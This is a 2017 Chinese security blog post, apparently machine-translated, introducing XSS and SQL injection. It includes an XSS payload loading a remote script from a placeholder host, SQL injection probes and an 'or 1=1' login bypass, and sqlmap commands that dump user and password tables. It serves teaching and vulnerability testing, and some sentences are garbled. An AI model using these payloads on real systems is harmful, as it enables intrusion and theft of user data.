【技术分享】Web安全之XSS与SQL注入

责声明">
又到了每周的干货分享时间!~ VSRC感谢业界小伙伴——古月林夕投稿精品原创类文章。VSRC欢迎精品原创类文章投稿,优秀文章一旦采纳发布,将有好礼相送,我们为您准备的丰富奖品包括但不仅限于:Macbo…
这是每周干货共享时间的时候了! ~ VSRC感谢业界的小伙伴——古月林夕提交原始文章。 VSRC欢迎提交精美的原创文章。一旦优秀的文章被采用,将有很好的礼物。我们为您准备的丰富奖品包括但不限于:MacbookAir,VSRC定制伞,VSRC定制水杯和VSRC精美POLO衫! (该活动的最终解释属于VSRC)   一,导言 近年来,随着Internet的迅速发展,Web安全问题的重要性越来越高。 Web应用程序面临的威胁来自许多方面。黑客的破坏是最有影响力的。黑客利用Web应用程序的漏洞非法入侵,从而破坏Web应用程序服务,窃取用户数据等。如何防止漏洞的安全性。威胁是一项艰巨的挑战。  为了增强用户的交互体验,开发人员在Web应用程序中使用大量客户端脚本,使Web应用程序的内容和功能丰富而有趣。但是,隐藏的安全威胁随之而来,黑客将攻击网络攻击。从服务器端到客户端,使用客户端脚本漏洞的攻击变得越来越强大,例如跨站点脚本(XSS)和SQL注入已经成为许多漏洞的最有针对性的目标。    二、XSS XSS(Cross Site Scripting)是一种特殊类型的Web客户端脚本注入攻击。这通常意味着攻击者通过“HTML注入”篡改网页,并在用户浏览网页时插入恶意脚本来控制浏览。对设备的攻击。 当应用程序发送到浏览器的页面包含未正确转义的用户提供的数据,或者在页面上显示内容之前未验证的数据时,输入被视为浏览器。中间的动态内容导致跨站点脚本漏洞。 根据“数据是否保存在服务器上”,XSS分为:反射XSS和存储XSS。 反射型XSS: 服务器不对用户请求参数执行任何编码或转义,并直接将参数作为响应的一部分输出到页面。反射XSS是一次性的,易于实施的网络钓鱼攻击,它会诱使攻击者点击恶意链接来触发漏洞。 存储型XSS:  攻击者提供恶意有效负载输入并将其保存在后台一段时间。一旦用户访问包含恶意程序的网页文件,就会形成有效的攻击。丰富的文本输入空间,存储XSS存在隐患,最严重的可能是导致XSS蠕虫。   1,简单的测试脚本检测漏洞(XSS有效载荷)     将有效负载作为用户输入参数提交。这些有效负载的目的是关闭html标记并弹出浏览器。如果服务器没有过滤请求参数,即直接弹出窗口,则浏览器直接解析并执行包含恶意代码的响应信息,从而触发XSS漏洞,误报率低。 当然,一些xss漏洞隐藏得更深,无法轻易检测到。有必要构建一个更强大的有效负载来绕过某些xss简单过滤。   2,xss攻击过程 确定可注入的xss漏洞后,诱骗用户加载远程脚本,例如将url的提交参数更改为 “&gt;&lt; script src=http://www.xxx.com/ec.js></script> 攻击者在这个远程脚本中写入真正的恶意负载,避免在url参数中直接写入大量js代码,并通过恶意脚本控制用户的浏览器以实现攻击目的。   三、SQL注入 攻击者向Web表单提交SQL命令,提交或输入域名或页面请求的查询字符串,最后到达欺骗服务器执行恶意SQL命令。 sql注入漏洞检测 1手动注入  一个。在参数中输入单个引号“',导致执行查询语句时出现语法错误,并获取服务器的错误回显以确定服务器的数据库类型信息. 根据数据库类型构造sql注入语句。 例如,get方法url [ http://www.xxx.com/abc.asp?p=YY ] 修改phttp://www.xxx.com/abc.asp?p=YY 和user&gt; 0的参数值以确定它是否是SQL-SERVER,还获取当前连接到数据库的用户名。 http://www.xxx.com/abc.asp?p=YY&n  db_name()&gt; 0不仅可以确定它是否是SQL-SERVER,还可以获取当前正在使用的数据库名称  湾盲目,大多数情况下Web服务器关闭错误回显。 http://www.xxx.com/abc.asp?p=1 和1=2 sql命令未建立,结果为空或错误  http://www.xxx.com/abc.asp?p=1 和1=1 sql命令已建立,结果正常返回  两次测试成功后,可以判断加载sql是否已执行,并且存在SQL注入漏洞。 手动注入网站示例。登录密码('或'1'='1)并成功进入管理后台。 2,自动化工具检测注射 SQLmap - 一个免费的开源工具,用于检测和利用SQL注入漏洞 Sqlmap.py -u [指定url] -cookie -dbs //列出数据库  Sqlmap.py -u [指定url] - D [数据库名称] - -tables //列出库 的数据表 Sqlmap.py -u [指定url] -D [数据库名称] -T [数据表名称] -columns //列出数据表的列名称  Sqlmap.py -u [指定url] -D dvwa -T users-C用户,密码-dump //列出用户名和密码(sqlmap自动破解密码)   网站拖动库示例        四、END 随着Internet的发展,强调保护Web安全是一种必然趋势。欢迎大家一起学习和交流。博客地址http://blog.csdn.net/swallowing_。
  • 发表于 2017-09-22 08:00
  • 阅读 ( 615 )
  • 分类:黑客技术

你可能感兴趣的文章

相关问题

0 条评论

请先 登录 后评论
不写代码的码农
黑客

2107 篇文章

作家榜 »

  1. 黑客 2107 文章